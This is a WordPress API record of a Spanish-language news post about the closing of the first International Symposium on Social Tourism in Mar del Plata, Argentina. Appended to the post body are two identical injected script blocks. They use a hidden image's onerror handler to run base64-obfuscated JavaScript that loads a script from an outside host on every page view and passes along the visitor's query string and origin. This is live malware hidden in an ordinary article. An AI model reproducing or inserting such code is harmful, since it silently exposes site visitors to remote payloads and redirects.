{"id":3161,"date":"2023-10-09T19:10:58","date_gmt":"2023-10-09T22:10:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3161"},"modified":"2025-08-14T00:07:30","modified_gmt":"2025-08-14T03:07:30","slug":"concluyo-el-primer-simposio-internacional-de-turismo-social","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3161","title":{"rendered":"Concluy\u00f3 el Primer Simposio Internacional de Turismo Social"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La jornada de cierre incluy\u00f3 una recorrida de los participantes por la Unidad Tur\u00edstica de Chapadmalal, puesta en valor por el Ministerio de Turismo y Deportes de la Naci\u00f3n.<\/em><\/h4>\n\n\n\n<p>El\u00a0<strong>1\u00b0 Simposio Internacional de Turismo Social<\/strong>\u00a0concluy\u00f3 hoy en Mar del Plata, con una recorrida de sus participantes por la emblem\u00e1tica Unidad Tur\u00edstica Chapadmalal y una exposici\u00f3n de la historiadora\u00a0<strong>Elisa Pastoriza<\/strong>, especialista en la tem\u00e1tica.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/20231007_115919.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Organizado por el\u00a0<strong>Ministerio de Turismo y Deportes de la Naci\u00f3n, la Universidad Nacional de Mar del Plata y la Organizaci\u00f3n Internacional de Turismo Social (ISTO)<\/strong>, el simposio hab\u00eda comenzado el jueves pasado, con un acto de apertura realizado en el aula magna de la Facultad de Ciencias Econ\u00f3micas y Sociales.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/20231005_163305_1.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Esa jornada continu\u00f3 con una charla a cargo de Erica Schenkel, investigadora del CONICET, sobre \u201cEl turismo social desde una perspectiva latinoamericana\u201d, y otra de Ver\u00f3nica G\u00f3mez Aguirre, directora sobre ISTO Am\u00e9ricas, referida a \u201cEl ADN del turismo social, solidario y sostenible\u201d.<\/p>\n\n\n\n<p>Durante el d\u00eda siguiente, el simposio fue el marco elegido para la presentaci\u00f3n del libro \u201cEl turismo como derecho\u201d, una publicaci\u00f3n del Ministerio que incluye im\u00e1genes hist\u00f3ricas de la etapa fundacional de las unidades tur\u00edsticas, otras que registran las recientes tareas de recuperaci\u00f3n y una tercera serie que refleja el disfrute de quienes se alojan en Chapadmalal y Embalse.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-10-06_at_13.02.03.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La agenda tambi\u00e9n abarc\u00f3 una exposici\u00f3n de Sergio Rodr\u00edgeuz Abitia, presidente de ISTO Am\u00e9ricas, sobre \u201cDise\u00f1o e implementaci\u00f3n de itinerarios de turismo social en clave regional\u201d y un panel que, bajo la consigna \u201cArticulaci\u00f3n p\u00fablico-privada para la gesti\u00f3n del turismo social\u201d, cont\u00f3 con la participaci\u00f3n de referentes en la tem\u00e1tica de Chile y Uruguay adem\u00e1s de la charla de Lisandro P\u00e9rez Losinno, subsecretario de Promoci\u00f3n Tur\u00edstica del Ministerio, sobre el PreViaje.<\/p>\n\n\n\n<p>Otros paneles analizaron \u201cExperiencias de pol\u00edticas p\u00fablicas provinciales y municipales de Argentina\u201d, \u201cExperiencias sindicales, cooperativas y mutuales\u201d y \u201cExperiencias y tratamiento del turismo social en el \u00e1mbito acad\u00e9mico universitario argentino\u201d. Por \u00faltimo, Isabel Novoa, presidente de ISTO Internacional, expuso sobre \u201cPor una sostenibilidad social en turismo\u201d.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La jornada de cierre incluy\u00f3 una recorrida de los participantes por la Unidad Tur\u00edstica de Chapadmalal, puesta en valor por el Ministerio de Turismo y Deportes de la Naci\u00f3n. El\u00a01\u00b0 Simposio Internacional de Turismo Social\u00a0concluy\u00f3 hoy en Mar del Plata, con una recorrida de sus participantes por la emblem\u00e1tica Unidad Tur\u00edstica Chapadmalal y una exposici\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3162,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-3161","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3161"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3161"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3161\/revisions"}],"predecessor-version":[{"id":6950,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3161\/revisions\/6950"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3162"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}